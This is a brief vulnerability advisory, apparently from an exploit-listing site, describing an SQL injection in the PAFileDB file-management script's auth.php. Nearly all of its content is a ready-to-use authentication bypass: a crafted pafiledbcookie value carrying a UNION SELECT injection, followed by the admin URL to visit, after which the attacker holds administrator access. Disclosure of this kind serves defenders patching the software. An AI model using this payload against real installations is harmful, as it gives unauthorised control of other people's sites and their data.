|
|
PAFileDB Auth.PHP SQL Injection Vulnerability
No exploit is required. The following example is available: Create pafiledbcookie Content is: [MD5 IP]%7CaG'+union+select+1,2,'pass',4,5/*%7Cpass navigate to: "http://www.example.com/pafiledb.php?action=admin": once there, attacker is logged in as admin in the access control panel. |
|
Privacy Statement |